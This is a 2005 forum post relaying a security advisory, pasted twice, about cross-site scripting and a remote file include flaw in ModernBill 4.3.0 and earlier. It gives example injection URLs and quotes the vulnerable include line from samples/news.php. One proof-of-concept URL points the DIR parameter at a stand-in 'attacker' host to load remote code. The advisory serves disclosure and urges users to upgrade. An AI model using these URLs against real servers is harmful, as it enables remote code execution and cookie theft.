exmx
04-14-2005, 09:12 PM
I just got this email from the securiteam.com mailling list, thought I should pass it along.
DETAILS
Vulnerable Systems:
* ModernBill version 4.3.0 and prior
Immune Systems:
* ModernBill version 4.3.1 or newer
Cross Site Scripting:
The ModernBill order forms are prone to multiple cross site scripting
issues. Bellow are a few examples of this particular issue:
http://example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS]
http://example.com/order/orderwiz.php?v=1&aid=[XSS]
This vulnerability could be used to steal cookie based authentication
credentials within the scope of the current domain, or render hostile code
in a victim's browser.
Remote File Include Vulnerability:
ModernBill ships with a directory titled "samples" that resides in the
root ModernBill directory. This directory contains several files to help
users learn how to customize ModernBill to specifically fit their needs.
One of the scripts included in this directory is vulnerable to a very
dangerous remote file include vulnerability. Lets have a look at the file
"news.php"
// ~~~~~~~~~~~~~~~~~
// DO NOT EDIT START
// ~~~~~~~~~~~~~~~~~
include_once($DIR."include/functions.inc.php");
If globals are set to on, and no include restrictions are in effect then
we can include any PHP code of our choice remotely. Of course the hosting
the malicious file to be included could not have php enabled, or the file
would be parsed before it reached the victim server:
http://example.com/samples/news.php?DIR=http://attacker/
This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.
Solution:
A fix for the mentioned issues has been available for quite some time now
and users should upgrade their ModernBill installations.
DETAILS
Vulnerable Systems:
* ModernBill version 4.3.0 and prior
Immune Systems:
* ModernBill version 4.3.1 or newer
Cross Site Scripting:
The ModernBill order forms are prone to multiple cross site scripting
issues. Bellow are a few examples of this particular issue:
http://example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS]
http://example.com/order/orderwiz.php?v=1&aid=[XSS]
This vulnerability could be used to steal cookie based authentication
credentials within the scope of the current domain, or render hostile code
in a victim's browser.
Remote File Include Vulnerability:
ModernBill ships with a directory titled "samples" that resides in the
root ModernBill directory. This directory contains several files to help
users learn how to customize ModernBill to specifically fit their needs.
One of the scripts included in this directory is vulnerable to a very
dangerous remote file include vulnerability. Lets have a look at the file
"news.php"
// ~~~~~~~~~~~~~~~~~
// DO NOT EDIT START
// ~~~~~~~~~~~~~~~~~
include_once($DIR."include/functions.inc.php");
If globals are set to on, and no include restrictions are in effect then
we can include any PHP code of our choice remotely. Of course the hosting
the malicious file to be included could not have php enabled, or the file
would be parsed before it reached the victim server:
http://example.com/samples/news.php?DIR=http://attacker/
This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.
Solution:
A fix for the mentioned issues has been available for quite some time now
and users should upgrade their ModernBill installations.